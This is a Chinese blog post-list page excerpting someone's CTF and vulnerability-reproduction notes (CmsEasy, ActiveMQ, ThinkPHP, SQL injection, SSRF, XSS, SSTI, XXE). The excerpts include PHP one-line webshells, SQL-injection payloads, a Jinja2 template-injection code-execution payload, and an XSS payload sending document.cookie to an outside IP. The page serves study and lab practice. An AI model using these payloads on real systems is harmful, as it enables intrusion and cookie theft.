- 博客(40)
- 资源 (1)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 解决hashcat报错
hashcat 有时候会出现以下报错hashcat (v6.1.1) starting in benchmark mode…Benchmarking uses hand-optimized kernel code by default.You can use it in your cracking session by setting the -O option.Note: Using optimized kernel code limits the maximum supported passwo
2021-12-03 01:54:52
7267
原创 CmsEasy_v5.7 代码执行漏洞复现
环境安装这就不多说了,官网自己下载CmsEasy_v5.7我下载的6.0也能用。首先网页长这样然后在网址后面输入/admin进入后台登陆登陆后台admin,admin点击,模板–自定义标签—添加自定义标签–填写Payload—提交:Payload: 1111111111";}<?php phpinfo()?>提交完要点击预览附绕代码检测的一句话Payload: 11";}<?php assert($_POST[g]);?>菜刀连接即可,他们说菜刀能连,我练
2021-08-16 18:49:11
2376
2
原创 ActiveMQ 反序列化漏洞(CVE-2015-5254)
运行漏洞环境:docker-compose up -d环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。下载利用工具git clone https://github.com.cnpmjs.org/ianxtianxt/jmet.git进入 jmet 文件执行语句java -jar jmet-0.1.0-all.jar
2021-07-27 17:37:31
207
原创 ActiveMQ任意文件写入漏洞(CVE-2016-3088)
嘻嘻,狗哥下任务了,开始我的漏洞复现之旅首先环境肯定是用vulhub创建进入vulhub文件夹,找漏洞目录运行漏洞环境:docker-compose up -d访问http://your-ip:8161/看到web页面,说明环境已成功运行。操作思路本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。三种方
2021-07-26 23:20:21
271
原创 ctfshow ssrf篇
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)web351-353前两个无过滤url=http://127.0.0.1/flag.php第三个payload:url=http://0x7F000001/flag.php也可以用地址转换进制转换web354Y4师傅
2021-07-03 22:30:24
380
2
原创 ctfshow代码审计篇
芜湖今天吧驾照靠过了,累死我了,睡一天才缓过劲来301首先sql语句没过滤,考虑sql注入用sqlmap。就行sqlmap.py -u http://0037a292-7a81-4c5f-a925-281dba2c5fe5.challenge.ctf.show:8080/login.php --form --batch --dump但是我没跑出来,可以利用sql写一句话userid=a ’ union select “<?php eval($_POST[1]);?>” into o
2021-06-29 23:58:41
333
2
原创 2021-06-24
今天学习了awvs的使用,但是存在一定问题漏洞扫不出来,害,也不知道自己啥时候才能挖到洞,buuctf就先停两天,还有实训的实验要整,又要学很多。
2021-06-24 02:44:47
94
原创 BUUctf第六天
[BUUCTF 2018]Online Tool细细品读这是个两个过滤字符出现的漏洞利用nmap写????namp 可以写木马,那么我们要做的,让nmap执行那个命令。但是这两个函数。会把我们的命令给放道单引号里,'\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php'最后的语句,就变成了:nmap -T5 -sT -Pn --host-timeout 2 -F '\<\?php eval\(\$_POST\[\"a\"\]\)\
2021-06-22 23:53:08
147
原创 BUUctf刷题第五天
每天坚持,绝对不能给自己找借口加油![网鼎杯 2018]Fakebook这题有一点ssrf,明天再看[MRCTF2020]你传你????呢.htaccess的文件上传和上传.user.ini方式差不多.htaceess的内容为<FilesMatch "a.png">SetHandler application/x-httpd-php</FilesMatch>解析一个a.png,当做php解析再上传a.png即可地址也给了蚁剑直接连收工[MRCTF20
2021-06-21 00:50:35
213
原创 BUUctf刷题第四天
[极客大挑战 2019]HardSQL这道题利用了报错注入updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)updatexml(1,concat(0x7e,(select(group
2021-06-20 00:00:24
171
原创 BUUctf刷题第三天
[极客大挑战 2019]BuyFlag进去是一个网页,查看源代码说只有啥玩意的学生才能买,就抓包看看发现cookie后面有个user=0,改成一试试改完后说我是啥啥啥的学生了可以支付购买了结合前面给的验证payload:?password=404a&money=100000000他还嫌钱的数字长,离谱,换成科学计数法感觉这道题非常有意思[BJDCTF2020]Easy MD5题目给了个github链接点进去能看到源码,我们先看index.php是个md5加密后的注入
2021-06-19 00:11:37
176
原创 ctf打卡第7天
打开网页,查看源代码是这样的首先判断是否存在一个$user,并且读取文件===the user is admin我们可以用php伪协议读取,他就会完整的等于文件内容php://input 是个可以访问请求的原始数据的只读流.这题不对劲呢,等会再说...
2021-06-18 20:06:12
236
1
原创 BUUctf刷题第二天
[ACTF2020 新生赛]Upload看名字是个文件上传确实是个文件上传,上传了个文件提示我:请上传jpg、png、gif结尾的图片噢上传了个文件,抓包发现没信息,是个前端验证我们改包即可把昨天学的那个phtml,文件改成png,之后抓包再改回来即可用蚁剑连接,flag在根目录简简单单啦[极客大挑战 2019]BabySQL是一个登陆框,就一个双写绕过就没啥了payload:?username=admin&password=admin' ununionion seselec
2021-06-17 21:16:53
142
原创 BUUctf刷题日记(四道题一个wp)
第13题开始了,以前的做过了[护网杯 2018]easy_tornado这是一道模板注入题,我看了没思路,看了wp才知道我还没见过这种模板…模板注入第一步,让他报错通过{{handler.settings}},可以获取到cookie我觉得有点神奇,模板注入这块我不是很懂,可以参考这个博客然后根据提示的公式,计算md5import hashlibhash = hashlib.md5()filename='/fllllllllllllag'cookie_secret="b978746
2021-06-17 01:56:26
255
原创 BUUctf 刷题日记
[HCTF 2018]WarmUp打开是个笑脸,源代码给了个地址进来是个php代码页面highlight_file(__FILE__); //打印代码class emmm //定义emmm类{ public static function checkFile(&$page)//将传入的参数赋给$page { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明$whiteli
2021-06-16 21:09:28
241
原创 ctf打卡第6天
今天不是web了,说整道misc放松我一开始一看是个流量分析题,再一看好像是之前国赛的题发现不太一样追踪http流 发现两个网址,点进去一看是个百度知道这莫非是个提示?我寻思半天,我以为要下载软件了都,突然想到没给其他文件啊犹豫中,想到snmp是个协议我就过滤看看是否有文件,于是我看到里面有个flag我就 追踪了下udp流发现了flag嘻嘻,写作业去了...
2021-06-15 23:21:12
100
原创 ctf打卡第五天
题目打开是这样的啥也没有呢就扫一下发现存在.git文件,下载下来网上有师傅写了个自动化脚本https://github.com/gakki429/Git_Extract.git自行下载运行后会生成一个网站名的文档打开生成的文件就获取到了flag还有一种方法是使用常规工具githack一步步分析commit,分析objects我不太了解git所以我就不写出来了。上面的脚本可自行分析非常好用,嘻嘻端午太忙了,这篇是补的...
2021-06-15 22:22:48
89
原创 ctf打卡第四天
题目是这样的empty() 函数用于检查一个变量是否为空。parse_url 用于分解一个urlparse_url() 函数可以解析 URL,返回其组成部分,此函数并不意味着给定的 URL 是合法的,它只是将上方列表中的各部分分开。parse_url() 可接受不完整的 URL,并尽量将其解析正确readfile() 函数读取一个文件,并写入到输出缓冲。我们这里可以用个其他协议file协议file协议主要用于访问本地计算机中的文件,好比通过Windows的资源管理器中打开文件或者通过右.
2021-06-11 15:33:52
244
3
原创 ctfshow web入门sqlmap篇
web201今天搞点轻松的,昨天晚上失眠了基础命令命令:python sqlmap.py xxxxxxx-u 指定注入点–dbs 跑库名–tables 跑表名–columns 跑字段名–dump 枚举数据-D 指定库 -T 指定表 -C指定字段–random-agent 每次访问切换请求头 防ban–delay=1 每次探测延时一秒 防ban–count 查看数据量 (某个表中的数据量)–level 1-5测试等级 level等级越高检测越详细payload:sqlmap.py
2021-06-09 19:48:26
953
原创 ctf打卡第三天
include("flag.php");class just4fun { var $enter; var $secret;}if (isset($_GET['pass'])) { $pass = $_GET['pass']; if(get_magic_quotes_gpc()){ $pass=stripslashes($pass); } $o = unserialize($pass); if ($o) { $o-&
2021-06-09 13:00:00
278
原创 盲注绕过总结
最近在各种师傅们的花式盲注下,惊呆了我和我的小伙伴我觉得是时候总结一下了,下次直接套用,嘻嘻基础盲注:判断数据:and substr((select 列名 from database().表名 limit 0,1),1,1)=‘z’1’ascii(substr((select flag from flag ) ,{0},1))>{1}id=1’ and left((select database()),1)=‘s’left:从字符表达式最左边一个字符开始返回指定数目的字符判断数据库库名
2021-06-08 21:43:23
162
原创 baby杯web wp
哈哈哈哈哈,这是我第一次进前三十的比赛,复现一下web1打开是个这个,查看源代码打开是个gitHub的弱口令密码库用bp,抓包爆破即可登陆即可查看flagweb2
2021-06-06 15:20:16
223
原创 ctf打卡第二天
第一题首先打开页面是这样的啥也没有,扫一下目录看看发现一个robots目录打开目录是一个备份文件,下载下来里面是这样的提示是PHP变量覆盖,我们从这下手使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。因此就产生了变量覆盖漏洞然后我传入get参数flag=flag在用post传入flag=flag发现没有flag我再次尝试吧传参这次吧get:flag=abcPOST:flag=abc我发现该出现flag的位置变成了abc,
2021-06-06 14:48:26
154
原创 文件上传绕过姿势
文件上传绕过姿势前端验证,抓包改即可后端文件类型限制绕过exif_imagetype()前端验证,抓包改即可后端文件类型限制auto_prepend_file=filename //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。它包含在所有php文件前先执行auto_append_file=a.jpg //解析后进行包含,它包含在所有php文件执行后执行先上传.user.ini在上传一句话图片妈然后打开上传目录,post传参即可,用蚁剑
2021-06-05 15:01:30
74
原创 ctf打卡的第一天
第一题 :题目为我寻思是直接用文件包含读文件呢,整半天整不出来看了wp后得知是用session写webshell,想起以前好像做过类似的wp是这么说的:首先我们要猜测session文件位置/var/lib/php/sess_PHPSESSID/var/lib/php/sessions/sess_PHPSESSID/var/lib/php5/sess_PHPSESSID/var/lib/php5/sessions/sess_PHPSESSID/tmp/sess_PHPSESSID/tm
2021-06-05 01:06:54
578
原创 ctfshow web入门 XXE
web373题目是这样的,我看的似懂非懂的// 允许加载外部实体libxml_disable_entity_loader(false);// xml文件来源于数据流$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); // 加载xml实体,参数为替代实体、加载外部子集 $dom->loadXML($xmlfile, LIBXML_NOENT
2021-06-03 19:22:59
481
原创 ctfshow web入门 xss篇
web316-web326首先用xss平台实验了下没有flag,群主说要生成连接,然后后台会有个机器人点一下呢咱们就生成连接<input onfocus="window.open('http://121.4.162.152:8888/'+document.cookie)" autofocus>然后用咱们的vps监听端口然后flag 就出来了详细绕过姿势看这个大佬博客<body onload="window.location.href='http://121.4.16
2021-05-31 14:33:43
879
原创 ctfshow ,web入门,sql注入题
芜湖,刚刚考完科目三,又是开始学习的一天web184之前的懒得重新写了,这里用"right join"右连接来把两个表连接起来进行查询pass字段,后面的单引号可以用16进制编码绕过RIGHT JOIN(右连接)用于获取右表所有记录,即使左表没有对应匹配的记录过滤了where 所以我们用 on过滤了单引号 所以我们用char(99) =cchar表 :char表回显43;然后我们写个脚本import requestsurl='http://1f6a8d55-3dd2-4924-a
2021-05-29 17:56:54
195
原创 php函数绕过姿势
intval($num,0)传入num[] 数组绕过Apache HTTPD 换行解析漏洞(CVE-2017-15715)(preg_match(’/^php$/i’, $a)(只有正则最后一个是 $ 才行)payload:abc%0aphpif($num==4476)传入科学计数法绕过payload: 4476e123上一个过滤字母还可以进制绕过0b?? : 二进制0??? : 八进制 0X?? : 16进制payload : ?num=010574在上面的基础上过滤0if(!s
2021-05-11 00:34:57
542
原创 命令执行
命令执行文件包含源码1.代码执行如果过滤system如过滤点单引号 和 点过滤了分号 和 括号过滤了include过滤了数字过滤了很多符号利用函数echo print isset unset include requireprint函数变了源代码eval变成include过滤了flag过滤了PHP强制加后缀PHP 并且不回显include变成system需要url编码提交过滤了分号过滤了cat.flag过滤了空格过滤了所有空格过滤了<>函数变成可利用函数文件包含源码if(isset($_G
2021-05-09 22:37:24
571
原创 thinkphp5.0.23漏洞复现
以post请求发送_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
2021-04-23 18:22:03
191
原创 sql的个人笔记
一,逻辑操作符ISNULLXXXXXX where name is null名字为空的人BETWEENxxxxx where salary between '20000' and '40000'薪水在两万到四万之间的INwhere salary in ('10','20','30' )薪水在10,20,30 的LIKE通配符有两个%百分号_下划线where salary like '200%'匹配200开头的where salary like '%200%'匹配包含200
2021-04-22 00:25:35
106
转载 linux命令大全
1、ls文件属性: -:普通文件d:目录文件b:块设备c:字符设备文件l:符号连接文件p:命令管道s:套接字文件文件权限: 9位数字,每3位一组 文件硬链接次数 文件所属主(owner) 文件的属组(group) 文件大小(size),单位默认是字节 ls常用选项: -l:显示文件属性,ls -l=ll -h:做相应的单位转换显示 -a:显示所有文件 -A:显示.和..以为的所有文件 -d:显示目录自身属性 -i:显示文件的缩影接点号码(index node ,
2021-04-17 21:08:22
1153
原创 网站文件
文件后缀robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛),此网站中的哪些内容是不能被搜索引擎的漫游器获取的,哪些是可以被(漫游器)获取的。 因为一些系统中的URL是大小写敏感的,所以robots.txt的文件名应统一为小写。robots.txt应放置于网站的根目录下。如果想单独定义搜索引擎的漫游器访问子目录时的行为,那么可以将自定的设置合并到根目录下的robots.txt,或者使用robots元数据。下面是VeryCMS里
2021-04-14 20:23:20
560
原创 PHP反序列化笔记
PHP反序列化基础函数魔法函数笔记基础函数序列化函数serialize()反序列化函数unserialize()魔法函数__construct()当一个对象创建时被调用__destruct()当一个对象销毁时被调用__toString()当一个对象被当作一个字符串使用__sleep() 在对象在被序列化之前运行__wakeup将在序列化之后立即被调用笔记绕过wakeup的执行(CVE-2016-7124):当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeu
2021-04-14 16:05:13
106
原创 模板注入SSTi笔记
模板注入SSTijinja2Smarty模板jinja2命令执行{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %}文件读写{% for c
2021-04-14 15:54:44
344
原创 Linux系统基础
Linux系统基础存放密码相关分类目录Ls命令日志目录分类打开方式命令绕过存放密码相关用户账号文件 /etc/passwd用户密码文件 /etc/shadow用户组文件 /etc/group/etc/passwd/ 用户名、密码、用户ID、主组ID、用户全称、主目录和登录shell/etc/shadow文件格式:用户名:密码:上次修改密码的时间:两次修改密码间隔的最少天数:两次修改密码间隔的最多天数:提前几天警告用户密码过期:密码过期几天禁用用户:过期时间:保留字段/etc/skel目
2021-04-14 15:12:31
111
原创 DC-1 靶机记录
DC-1 靶机记录工具kali2020DC-1 靶机记录1.扫描靶机ipnetdiscover -i eth01.nmap 扫描ip信息开放了80端口,先去访问发现个登陆平台,注册失败百度了一下发现有漏洞利用,我先看看这是哪个版本发现是Drupal 7...
2021-02-04 08:15:51
94
原创 Me-and-My-Girlfriend-1靶机的Writeup
Me-and-My-Girlfriend-1靶机的Writeup实验工具实验内容第一步用扫描靶机ip第二步用nmap探测端口实验工具kali 2020Me-and-My-Girlfriend-1靶机实验内容第一步用扫描靶机ip输入代码,查找靶机ipnetdiscover -i eth0第二步用nmap探测端口...
2021-02-03 11:33:47
206
xss平台伪静态配置问题
2019-03-04
TA创建的收藏夹 TA关注的收藏夹
TA关注的人